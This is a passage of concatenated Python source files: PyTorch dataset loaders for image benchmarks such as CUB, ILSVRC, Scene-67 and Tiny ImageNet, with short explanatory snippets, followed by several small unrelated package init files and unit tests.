img_labels.append(np.asarray(labels))
return img_name_list, img_labels
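`read_labeled_image_list` accepts two line formats: `path;label` and whitespace-separated `path label [label ...]`, appending `.jpg` when a two-token path has no extension. A condensed, testable version of that branching (same control flow minus the file I/O; labels are coerced to `int` in every branch for clarity):

```python
def parse_line(line):
    # Mirrors the branching in CUB.read_labeled_image_list.
    if ';' in line:
        image, labels = line.strip("\n").split(';')
        labels = int(labels)
    elif len(line.strip().split()) == 2:
        image, labels = line.strip().split()
        if '.' not in image:
            image += '.jpg'  # bare name: assume a .jpg file
        labels = int(labels)
    else:
        parts = line.strip().split()
        image, labels = parts[0], [int(x) for x in parts[1:]]
    return image, labels

assert parse_line("birds/001 7\n") == ("birds/001.jpg", 7)
assert parse_line("img.png;3\n") == ("img.png", 3)
assert parse_line("multi.jpg 1 2 3\n") == ("multi.jpg", [1, 2, 3])
```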
class CUB_crop(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, mode='train', return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
csv_file (string): Path to the csv file with annotations.
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_CUB?
self.mode = mode
# self.path_images = os.path.join(self.path_dataset, mode + '2014')
self.path_images = os.path.join(self.path_dataset, 'images')
self.return_path = return_path
self.datalist_file = os.path.join(self.path_dataset, 'lists/%s_crop_list.txt'%self.mode)
list_names, labels, bboxes = self.read_labeled_image_crop_list(self.path_images, self.datalist_file)
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
self.trainFlag = False
list_names = np.array(list_names)
labels = np.array(labels)
bboxes = np.array(bboxes)
self.list_names = list_names
self.labels = labels
self.bboxes = bboxes
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
self.bboxes = bboxes[:N]
print("Init CUB_200_2011 crop dataset in mode {}".format(mode))
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = self.list_names[index]
        assert os.path.exists(img_name), 'file {} does not exist'.format(img_name)
image = Image.open(img_name).convert('RGB')
# print(image.size)
# print(self.bboxes[index])
# print(self.labels)
# print(self.list_names)
# pdb.set_trace()
# crop image using gt bbox <x> <y> <width> <height>
# (It will not change orginal image)
left, top, width, height = self.bboxes[index]
right = left + width
bottom = top + height
image = image.crop((left, top, right, bottom))
# image = image.crop((int(left), int(top), int(right), int(bottom)))
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
            gt_label = self.labels[index].astype(np.int64)
if self.return_path:
return image, gt_label, img_name.split('/')[-1].split('.')[0]
else:
return image, gt_label
def read_labeled_image_crop_list(self, data_dir, data_list):
"""
Reads txt file containing paths to images, ground truth labels and bounding boxes.
Args:
data_dir: path to the directory with images and masks.
data_list: path to the file with lines of the form '/path/to/image /path/to/mask'.
Returns:
Two lists with all file names for images and labels, respectively.
And an array of bounding boxes.
"""
f = open(data_list, 'r')
img_name_list = []
img_labels = []
img_bboxes = []
for line in f:
line = line.strip().split()
image = line[0]
labels = int(line[1])
bbox = json.loads('[%s]' % (','.join(line[2:])))
# pdb.set_trace()
img_name_list.append(os.path.join(data_dir, image))
img_labels.append(np.asarray(labels))
img_bboxes.append(bbox)
return img_name_list, img_labels, img_bboxes
# return img_name_list, img_labels, np.array(img_bboxes)
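`CUB_crop.__getitem__` converts the annotation's `(x, y, width, height)` box into the `(left, top, right, bottom)` tuple that `PIL.Image.crop` expects. The conversion is just:

```python
def xywh_to_ltrb(bbox):
    # (left, top, width, height) -> (left, top, right, bottom),
    # the box format PIL's Image.crop() expects.
    left, top, width, height = bbox
    return (left, top, left + width, top + height)

assert xywh_to_ltrb((10, 20, 100, 50)) == (10, 20, 110, 70)
```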
# ILSVRC
class ILSVRC(Dataset):
def __init__(self, root, mode='train', return_path=False, N=None,
transform=None, onehot_label=False, num_classes=ilsvrc_classes): #'train', 'test', 'val', num_tgt_cls=ilsvrc_classes
# self.num_tgt_cls = num_tgt_cls
self.mode = mode
self.path_dataset = root # PATH_ILSVRC
self.path_images = os.path.join(self.path_dataset, 'images', self.mode) # rearrange folder
self.return_path = return_path
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
# get list images
with open(os.path.join(self.path_dataset, 'lists/%s_list.txt'%self.mode), 'r') as f:
tmp = f.readlines()
list_names = [l.split(' ')[0] for l in tmp] # .JPEG
list_names = np.array([n.split('.')[0] for n in list_names])
self.list_names = list_names
labels = [int(l.split(' ')[1]) for l in tmp]
labels = np.array(labels)
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
# if mode=='train':
# random.shuffle(self.list_names)
# embed()
print("Init ILSVRC dataset in mode {}".format(mode))
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
# img_name = self.list_names[index]
img_name = os.path.join(self.path_images, self.list_names[index]+'.JPEG')
        assert os.path.exists(img_name), 'file {} does not exist'.format(img_name)
image = Image.open(img_name).convert('RGB')
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
            gt_label = self.labels[index].astype(np.int64)
if self.return_path:
return image, gt_label, self.list_names[index]
else:
return image, gt_label
# # Image and saliency map paths
# rgb_ima = os.path.join(self.path_images, self.list_names[index]+'.JPEG')
# image = scipy.misc.imread(rgb_ima, mode='RGB')
#
#
# image = cv2.resize(image, (self.img_w, self.img_h), interpolation=cv2.INTER_AREA).astype(np.float32)
# img_processed = self.transform(image / 255.)
#
# label = self.labels[index]
#
# if self.return_path:
# return img_processed, label, self.list_names[index]
# else:
# return img_processed, label
# ==== collate_fn for handling grayscale images in batch of RGB images ====
def collate_fn_caltech(batch): # This does not work when normalization transform contains 3-dim mean and std.
images = list()
labels = list()
# pdb.set_trace()
for i, X in enumerate(batch):
        # print('X[0]', X[0].size(0))  # debug leftover
# if X[0].size(0) < 3:
# tmp_img = X[0].repeat(3, 1, 1)
# print('tmp_img', tmp_img.size())
# images.append(tmp_img.unsqueeze(0))
if X[0].size(0) == 3:
images.append(X[0].unsqueeze(0))
else:
images.append(X[0].unsqueeze(0).repeat(1, 3, 1, 1))
labels.append(X[1])
# labels.append(X[1].unsqueeze(0))
images_batch = torch.cat(images, dim=0)
# images_batch = torch.cat(labels, dim=0)
labels_batch = torch.tensor(labels)
return images_batch, labels_batch
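`collate_fn_caltech` promotes 1-channel tensors to 3 channels via `repeat` before stacking, so grayscale Caltech images can be batched with RGB ones. The channel-promotion rule, shown on nested lists so the sketch stays dependency-free (the real code operates on `torch` tensors):

```python
def to_rgb(channels):
    # A 1-channel image becomes 3 identical channels;
    # 3-channel images pass through unchanged.
    if len(channels) == 1:
        return channels * 3
    return channels

gray = [[[0.1, 0.2], [0.3, 0.4]]]  # 1 x H x W
rgb = to_rgb(gray)
assert len(rgb) == 3 and rgb[0] == rgb[2]
assert to_rgb([[1], [2], [3]]) == [[1], [2], [3]]
```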
# ==== weakly object segmentation ====
# Object Discovery; generate list from folder
class ObjectDiscovery(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
csv_file (string): Path to the csv file with annotations.
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_EVENT
# self.path_images = self.path_dataset
self.path_images = os.path.join(self.path_dataset, 'Data')
self.return_path = return_path
self.datalist_file = os.path.join(self.path_dataset, 'image_list.txt')
list_names, labels = self.read_labeled_image_list(self.datalist_file)
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
self.trainFlag = False
list_names = np.array(list_names)
labels = np.array(labels)
self.list_names = list_names
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
print("Init ObjectDiscovery dataset ...")
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = os.path.join(self.path_images, self.list_names[index])
        assert os.path.exists(img_name), 'file {} does not exist'.format(img_name)
image = Image.open(img_name).convert('RGB')
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
            gt_label = self.labels[index].astype(np.int64)
if self.return_path:
# return image, gt_label, img_name.split('/')[-1].split('.')[0]
return image, gt_label, self.list_names[index]
else:
return image, gt_label
def read_labeled_image_list(self, data_list):
"""
Reads txt file containing paths to images and ground truth masks.
Args:
data_dir: path to the directory with images and masks.
data_list: path to the file with lines of the form '/path/to/image /path/to/mask'.
Returns:
Two lists with all file names for images and masks, respectively.
"""
f = open(data_list, 'r')
img_name_list = []
img_labels = []
for line in f:
if ';' in line:
image, labels = line.strip("\n").split(';')
else:
if len(line.strip().split()) == 2:
image, labels = line.strip().split()
if '.' not in image:
image += '.jpg'
labels = int(labels)
else:
line = line.strip().split()
image = line[0]
labels = map(int, line[1:])
# img_name_list.append(os.path.join(data_dir, image))
img_name_list.append(image)
img_labels.append(np.asarray(labels))
return img_name_list, img_labels
# ==== other datasets used in cross-dataset classification ====
# STL_train (pytorch) shuffle=False, index follow the order; generate list from dataloader
# STL_test (pytorch) shuffle=False, index follow the order; generate list from dataloader
# caltech-101 (pytorch) shuffle=False, index follow the order; generate list from dataloader
# caltech-256 (pytorch) shuffle=False, index follow the order; generate list from dataloader
# Event-8; generate list from folder
class Event8(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
csv_file (string): Path to the csv file with annotations.
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_EVENT
self.path_images = self.path_dataset
# self.path_images = os.path.join(self.path_dataset, 'images')
self.return_path = return_path
self.datalist_file = os.path.join(self.path_dataset, 'image_list.txt')
list_names, labels = self.read_labeled_image_list(self.datalist_file)
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
self.trainFlag = False
list_names = np.array(list_names)
labels = np.array(labels)
self.list_names = list_names
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
print("Init Event-8 dataset ...")
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = os.path.join(self.path_images, self.list_names[index])
        assert os.path.exists(img_name), 'file {} does not exist'.format(img_name)
image = Image.open(img_name).convert('RGB') # try not use PIL Image, not use ToTensor before ZCA tomorrow
# image = scipy.misc.imread(img_name, mode='RGB')
# image = cv2.resize(image, tuple(CIFAR_RESIZE), interpolation=cv2.INTER_LINEAR)
# # # image = image.astype('float32')
# # # image = cv2.resize(image, (input_h, input_w), interpolation=cv2.INTER_LINEAR)
# image = torch.tensor(image, dtype=torch.float32)
# zca = ZCAWhitening().fit(image)
# image = zca(image)
# image = image.numpy()
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
            gt_label = self.labels[index].astype(np.int64)
if self.return_path:
# return image, gt_label, img_name.split('/')[-1].split('.')[0]
return image, gt_label, self.list_names[index]
else:
return image, gt_label
def read_labeled_image_list(self, data_list):
"""
Reads txt file containing paths to images and ground truth masks.
Args:
data_dir: path to the directory with images and masks.
data_list: path to the file with lines of the form '/path/to/image /path/to/mask'.
Returns:
Two lists with all file names for images and masks, respectively.
"""
f = open(data_list, 'r')
img_name_list = []
img_labels = []
for line in f:
if ';' in line:
image, labels = line.strip("\n").split(';')
else:
if len(line.strip().split()) == 2:
image, labels = line.strip().split()
if '.' not in image:
image += '.jpg'
labels = int(labels)
else:
line = line.strip().split()
image = line[0]
labels = list(map(int, line[1:])) # materialize the map so np.asarray builds an int array, not a 0-d object array
# img_name_list.append(os.path.join(data_dir, image))
img_name_list.append(image)
img_labels.append(np.asarray(labels))
f.close()
return img_name_list, img_labels
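The reader above branches over three line formats: semicolon-separated, two-token `<image> <label>`, and multi-label lines. A minimal standalone sketch of the same parsing rules (a hypothetical helper for illustration, not part of the class):

```python
import numpy as np

def parse_label_line(line):
    # Mirrors read_labeled_image_list: ';'-separated, two-token, or multi-label lines.
    if ';' in line:
        image, labels = line.strip("\n").split(';')
        labels = int(labels)
    elif len(line.strip().split()) == 2:
        image, labels = line.strip().split()
        if '.' not in image:
            image += '.jpg'  # bare names are assumed to be .jpg files
        labels = int(labels)
    else:
        parts = line.strip().split()
        image = parts[0]
        labels = list(map(int, parts[1:]))  # list() so np.asarray gets concrete ints
    return image, np.asarray(labels)
```

Lines like `cat 5` therefore come back as `('cat.jpg', array(5))`, while multi-label lines keep every integer after the first token.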
# Action-40; generate list from folder
class Action40(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
csv_file (string): Path to the csv file with annotations.
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_EVENT
# self.path_images = self.path_dataset
self.path_images = os.path.join(self.path_dataset, 'JPEGImages')
self.return_path = return_path
self.datalist_file = os.path.join(self.path_dataset, 'image_list.txt')
list_names, labels = self.read_labeled_image_list(self.datalist_file)
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
self.trainFlag = False
list_names = np.array(list_names)
labels = np.array(labels)
self.list_names = list_names
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
print("Init Action-40 dataset ...")
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = os.path.join(self.path_images, self.list_names[index])
assert os.path.exists(img_name), 'file {} does not exist'.format(img_name)
image = Image.open(img_name).convert('RGB')
# image = scipy.misc.imread(img_name, mode='RGB')
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
gt_label = self.labels[index].astype(np.int64) # np.long was removed in NumPy 1.24; use np.int64
if self.return_path:
# return image, gt_label, img_name.split('/')[-1].split('.')[0]
return image, gt_label, self.list_names[index]
else:
return image, gt_label
def read_labeled_image_list(self, data_list):
"""
Reads txt file containing paths to images and ground truth masks.
Args:
data_dir: path to the directory with images and masks.
data_list: path to the file with lines of the form '/path/to/image /path/to/mask'.
Returns:
Two lists with all file names for images and masks, respectively.
"""
f = open(data_list, 'r')
img_name_list = []
img_labels = []
for line in f:
if ';' in line:
image, labels = line.strip("\n").split(';')
else:
if len(line.strip().split()) == 2:
image, labels = line.strip().split()
if '.' not in image:
image += '.jpg'
labels = int(labels)
else:
line = line.strip().split()
image = line[0]
labels = list(map(int, line[1:])) # materialize the map so np.asarray builds an int array, not a 0-d object array
# img_name_list.append(os.path.join(data_dir, image))
img_name_list.append(image)
img_labels.append(np.asarray(labels))
f.close()
return img_name_list, img_labels
# Scene-67; generate list from folder
class Scene67(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
csv_file (string): Path to the csv file with annotations.
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_EVENT
# self.path_images = self.path_dataset
self.path_images = os.path.join(self.path_dataset, 'Images')
self.return_path = return_path
self.datalist_file = os.path.join(self.path_dataset, 'image_list.txt')
list_names, labels = self.read_labeled_image_list(self.datalist_file)
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
self.trainFlag = False
list_names = np.array(list_names)
labels = np.array(labels)
self.list_names = list_names
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
print("Init Scene-67 dataset ...")
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = os.path.join(self.path_images, self.list_names[index])
assert os.path.exists(img_name), 'file {} does not exist'.format(img_name)
image = Image.open(img_name).convert('RGB')
# image = scipy.misc.imread(img_name, mode='RGB')
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
gt_label = self.labels[index].astype(np.int64) # np.long was removed in NumPy 1.24; use np.int64
if self.return_path:
# return image, gt_label, img_name.split('/')[-1].split('.')[0]
return image, gt_label, self.list_names[index]
else:
return image, gt_label
def read_labeled_image_list(self, data_list):
"""
Reads txt file containing paths to images and ground truth masks.
Args:
data_dir: path to the directory with images and masks.
data_list: path to the file with lines of the form '/path/to/image /path/to/mask'.
Returns:
Two lists with all file names for images and masks, respectively.
"""
f = open(data_list, 'r')
img_name_list = []
img_labels = []
for line in f:
if ';' in line:
image, labels = line.strip("\n").split(';')
else:
if len(line.strip().split(' ')) == 2:
image, labels = line.strip().split()
if '.' not in image:
image += '.jpg'
labels = int(labels)
else: # if image name contains space
line = line.strip().split(' ')
image = ' '.join(line[:-1])
# labels = map(int, line[1:])
labels = int(line[-1])
# img_name_list.append(os.path.join(data_dir, image))
img_name_list.append(image)
img_labels.append(np.asarray(labels))
f.close()
return img_name_list, img_labels
# Tiny Imagenet
class TinyImagenet(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, mode='train', return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_CUB?
self.mode = mode
self.path_images = os.path.join(self.path_dataset, self.mode)
self.return_path = return_path
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
label_indices = range(self.num_classes)
# this might be faster than reading folders from disk?
wnids_txt = os.path.join(self.path_dataset, 'wnids.txt')
with open(wnids_txt) as f:
# label_wnids = f.readlines()
label_wnids = f.read().splitlines()
self.label_dict = dict(zip(label_wnids, label_indices))
if self.mode == 'train':
list_names = []
labels = []
for label in label_wnids:
bbox_txt = os.path.join(self.path_images, label, label+'_boxes.txt')
# pdb.set_trace()
with open(bbox_txt) as f:
# lines = f.readlines()
# names = [os.path.join(self.path_images, label, 'images', l.split(' ')[0]) for l in lines]
lines = f.read().splitlines()
names = [os.path.join(self.path_images, label, 'images', l.split('\t')[0]) for l in lines]
list_names.extend(names)
labels.extend([self.label_dict[label]]*len(names))
elif self.mode == 'val':
anno_txt = os.path.join(self.path_images, 'val_annotations.txt')
# pdb.set_trace()
with open(anno_txt) as f:
# lines = f.readlines()
# names = [os.path.join(self.path_images, 'images', l.split(' ')[0]) for l in lines]
# lbs = [self.label_dict[l.split(' ')[1]] for l in lines]
lines = f.read().splitlines()
list_names = [os.path.join(self.path_images, 'images', l.split('\t')[0]) for l in lines]
labels = [self.label_dict[l.split('\t')[1]] for l in lines]
assert max(labels) == (self.num_classes-1)
list_names = np.array(list_names)
self.list_names = list_names
labels = np.array(labels)
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
print("Init Tiny ImageNet dataset in mode {}".format(mode))
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = self.list_names[index]
assert os.path.exists(img_name), 'file {} does not exist'.format(img_name)
image = Image.open(img_name).convert('RGB')
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
gt_label = self.labels[index].astype(np.int64) # np.long was removed in NumPy 1.24; use np.int64
if self.return_path:
return image, gt_label, img_name.split('/')[-1].split('.')[0]
else:
return image, gt_label
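Every `__getitem__` above builds the one-hot target the same way; the pattern in isolation (a hypothetical helper, shown here only to make the branch explicit):

```python
import numpy as np

def to_onehot(label, num_classes):
    # Zero vector with a 1 at the class index, matching the onehot_label branch.
    gt = np.zeros(num_classes, dtype=np.float32)
    gt[int(label)] = 1
    return gt
```

For example, `to_onehot(2, 4)` yields `[0., 0., 1., 0.]` as float32, which is the shape a BCE-style loss expects.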
if __name__ == "__main__":
# transformation for training set
tencrop = True
print("tencrop:", tencrop)
mean_vals = [0.485, 0.456, 0.406]
std_vals = [0.229, 0.224, 0.225]
# input_size = (256, 256)
# crop_size = (224, 224) # ILSVRC, CUB
input_size = (80, 80)
crop_size = (80, 80) # CUB_crop
tsfm_train = transforms.Compose([transforms.Resize(input_size), # 256
transforms.RandomCrop(crop_size), # 224
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean_vals, std_vals)])
if tencrop:
func_transforms = [transforms.Resize(input_size),
transforms.TenCrop(crop_size),
transforms.Lambda(
lambda crops: torch.stack(
[transforms.Normalize(mean_vals, std_vals)(transforms.ToTensor()(crop)) for crop in
crops])),
]
else:
func_transforms = [transforms.Resize(input_size),
# transforms.Resize(crop_size),
transforms.CenterCrop(crop_size),
transforms.ToTensor(),
transforms.Normalize(mean_vals, std_vals), ]
tsfm_clstest = transforms.Compose(func_transforms)
# transformation for test loc set
tsfm_loctest = transforms.Compose([transforms.Resize(crop_size), # 224
transforms.ToTensor(),
transforms.Normalize(mean_vals, std_vals)])
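The TenCrop `Lambda` above normalizes each crop and stacks them, so the batch gains an extra crop dimension. A NumPy sketch of that stack-and-normalize step (illustrative only, not the torchvision internals):

```python
import numpy as np

def normalize_and_stack(crops, mean, std):
    # crops: list of (H, W, 3) float arrays in [0, 1]; returns (n_crops, H, W, 3).
    mean = np.asarray(mean, dtype=np.float32)
    std = np.asarray(std, dtype=np.float32)
    return np.stack([(c - mean) / std for c in crops])
```

With ten crops the dataloader then yields tensors of shape `(batch, 10, C, H, W)`, which is why ten-crop evaluation code typically flattens the first two dimensions before the forward pass.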
# test ILSVRC datasets
# # ds_train = ILSVRC(root=PATH_ILSVRC, N=4, return_path=True, mode='train', transform=tsfm_train) # OK image, label, (, image_name)
# ds_train = ILSVRC(root=PATH_ILSVRC, N=4, return_path=True, mode='val', transform=tsfm_clstest) # OK image, label, (, image_name)
# test CUB datasets
# ds_train = CUB(root=PATH_CUB, N=4, return_path=True, mode='train', transform=tsfm_train) # OK image, label, (, image_name)
# ds_train = CUB(root=PATH_CUB, N=4, return_path=True, mode='test', transform=tsfm_clstest) # OK image, label, (, image_name)
# test CUB_crop datasets
# ds_train = CUB_crop(root=PATH_CUB, N=4, return_path=True, mode='train', transform=tsfm_train) # OK image, label, (, image_name)
# ds_train = CUB_crop(root=PATH_CUB, N=4, return_path=True, mode='test', transform=tsfm_clstest) # OK image, label, (, image_name)
# test Caltech datasets
# caltech_transforms = transforms.Compose([transforms.Resize(crop_size), # 224
# transforms.ToTensor(),])
#
# # ds_train = datasets.Caltech101(PATH_CALTECH101, download=False, transform=caltech_transforms)
# # train_dataloader = DataLoader(ds_train, batch_size=2, shuffle=True, num_workers=2, collate_fn=collate_fn_caltech)
# ds_train = Caltech101(PATH_CALTECH101, download=False, transform=tsfm_train)
# test Event-8 dataset
# ds_train = Event8(root=PATH_EVENT, N=4, return_path=True, transform=tsfm_train) # OK image, label, (, image_name)
# test Action-40 dataset
# ds_train = Action40(root=PATH_ACTION, N=4, return_path=True, transform=tsfm_train) # OK image, label, (, image_name)
# test Scene-67 dataset
# ds_train = Scene67(root=PATH_SCENE, N=4, return_path=True, transform=tsfm_train) # OK image, label, (, image_name)
# test ObjectDiscovery dataset
# ds_train = ObjectDiscovery(root=PATH_OD, N=4, return_path=True, transform=tsfm_train) # OK image, label, (, image_name)
# test TinyImagenet dataset
ds_train = TinyImagenet(root=PATH_TINYIM, N=4, return_path=True, mode='train', transform=tsfm_train) # OK image, label, (, image_name)
# ds_train = TinyImagenet(root=PATH_TINYIM, N=4, return_path=True, mode='val', transform=tsfm_train) # OK image, label, (, image_name)
train_dataloader = DataLoader(ds_train, batch_size=2, shuffle=True, num_workers=2)
for i, X in enumerate(train_dataloader):
print(i)
print('images', X[0].size())
print('labels', X[1].size())
print('image_names', X[-1])
# if i>10:
# break
# ==== promoterz/__init__.py (repo: emillj/gekkoJaponicus, license: MIT) ====
#!/bin/python
from . import functions
from . import supplement, validation, utils
from . import evaluation, evolutionHooks
from . import world, locale
from . import evaluationPool
# ==== src/wai/annotations/core/help/__init__.py (repo: waikato-ufdl/wai-annotations-core, license: Apache-2.0) ====
"""
Utilities for providing generated help messages.
"""
from ._format_stage_usage import format_stage_usage
from ._MainUsageFormatter import MainUsageFormatter
from ._plugin_usage_formatter_with_default_start_indent import plugin_usage_formatter_with_default_start_indent
from ._PluginUsageFormatter import PluginUsageFormatter
# ==== sdk/lusid_notifications/api/__init__.py (repo: finbourne/notifications-sdk-python-preview, license: MIT) ====
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
from lusid_notifications.api.application_metadata_api import ApplicationMetadataApi
from lusid_notifications.api.deliveries_api import DeliveriesApi
from lusid_notifications.api.event_types_api import EventTypesApi
from lusid_notifications.api.events_api import EventsApi
from lusid_notifications.api.notifications_api import NotificationsApi
from lusid_notifications.api.subscriptions_api import SubscriptionsApi
# ==== test/solution_tests/HLO/test_hlo.py (repo: DPNT-Sourcecode/CHK-itim01, license: Apache-2.0) ====
from solutions.HLO import hello_solution
class TestHlo():
def test_hlo(self):
assert hello_solution.hello("World") == "Hello, World!"
assert hello_solution.hello("Friend") == "Hello, Friend!"
# ==== Testing/PythonTests/reconstructpca.py (repo: SCIInstitute/shapeworks, license: MIT) ====
import os
import sys
from shapeworks import *
success = True
def pcamodesTestRBFS():
print("\npython pcamodesTestRBFS")
denseFile = os.environ["DATA"] + "/_dense.vtk"
sparseFile = os.environ["DATA"] + "/_sparse.particles"
goodPointsFile = os.environ["DATA"] + "/_goodPoints.txt"
worldParticles = []
worldParticles.append(os.environ["DATA"] + "/ellipsoid_00.world.particles")
worldParticles.append(os.environ["DATA"] + "/ellipsoid_01.world.particles")
worldParticles.append(os.environ["DATA"] + "/ellipsoid_02.world.particles")
reconstructor = ReconstructSurface_RBFSSparseTransform(denseFile, sparseFile, goodPointsFile)
reconstructor.setOutPrefix("rbfs")
reconstructor.setOutPath(".")
reconstructor.setNumOfParticles(128)
reconstructor.setNumOfModes(1)
reconstructor.setNumOfSamplesPerMode(3)
reconstructor.samplesAlongPCAModes(worldParticles)
baselineDenseMesh1 = Mesh(os.environ["DATA"] + "/reconstruct_pca_python/rbfs_mode-00_sample-000_dense.vtk")
baselineDenseMesh2 = Mesh(os.environ["DATA"] + "/reconstruct_pca_python/rbfs_mode-00_sample-001_dense.vtk")
baselineDenseMesh3 = Mesh(os.environ["DATA"] + "/reconstruct_pca_python/rbfs_mode-00_sample-002_dense.vtk")
denseMesh1 = Mesh("mode-00/rbfs_mode-00_sample-000_dense.vtk")
denseMesh2 = Mesh("mode-00/rbfs_mode-00_sample-001_dense.vtk")
denseMesh3 = Mesh("mode-00/rbfs_mode-00_sample-002_dense.vtk")
print("comparing dense mesh 1...")
success = baselineDenseMesh1 == denseMesh1
print("comparing dense mesh 2...")
success = success and baselineDenseMesh2 == denseMesh2
print("comparing dense mesh 3...")
success = success and baselineDenseMesh3 == denseMesh3
return success
success &= utils.test(pcamodesTestRBFS)
def pcamodesTestThinPlateSpline():
print("\npython pcamodesTestThinPlateSpline")
denseFile = os.environ["DATA"] + "/_dense.vtk"
sparseFile = os.environ["DATA"] + "/_sparse.particles"
goodPointsFile = os.environ["DATA"] + "/_goodPoints.txt"
worldParticles = []
worldParticles.append(os.environ["DATA"] + "/ellipsoid_00.world.particles")
worldParticles.append(os.environ["DATA"] + "/ellipsoid_01.world.particles")
worldParticles.append(os.environ["DATA"] + "/ellipsoid_02.world.particles")
reconstructor = ReconstructSurface_ThinPlateSplineTransform(denseFile, sparseFile, goodPointsFile)
reconstructor.setOutPrefix("tps")
reconstructor.setOutPath(".")
reconstructor.setNumOfParticles(128)
reconstructor.setNumOfModes(1)
reconstructor.setNumOfSamplesPerMode(3)
reconstructor.setMaxStdDev(5)
reconstructor.samplesAlongPCAModes(worldParticles)
baselineDenseMesh1 = Mesh(os.environ["DATA"] + "/reconstruct_pca_python/tps_mode-00_sample-000_dense.vtk")
baselineDenseMesh2 = Mesh(os.environ["DATA"] + "/reconstruct_pca_python/tps_mode-00_sample-001_dense.vtk")
baselineDenseMesh3 = Mesh(os.environ["DATA"] + "/reconstruct_pca_python/tps_mode-00_sample-002_dense.vtk")
denseMesh1 = Mesh("mode-00/tps_mode-00_sample-000_dense.vtk")
denseMesh2 = Mesh("mode-00/tps_mode-00_sample-001_dense.vtk")
denseMesh3 = Mesh("mode-00/tps_mode-00_sample-002_dense.vtk")
success = True
print("comparing dense mesh 1...")
success = baselineDenseMesh1 == denseMesh1
print("comparing dense mesh 2...")
success = success and baselineDenseMesh2 == denseMesh2
print("comparing dense mesh 3...")
success = success and baselineDenseMesh3 == denseMesh3
return success
success &= utils.test(pcamodesTestThinPlateSpline)
sys.exit(not success)
# ==== kwat/matrix_factorization/__init__.py (repo: KwatME/ccal, license: MIT) ====
from .factorize import factorize
from .factorize_with_nmf import factorize_with_nmf
from .make_label import make_label
from .plot import plot
from .solve import solve
# ==== tensorlayerx/nn/layers/recurrent.py (repo: tensorlayer/TensorLayerX, license: Apache-2.0) ====
#! /usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
import tensorlayerx as tlx
from tensorlayerx import logging
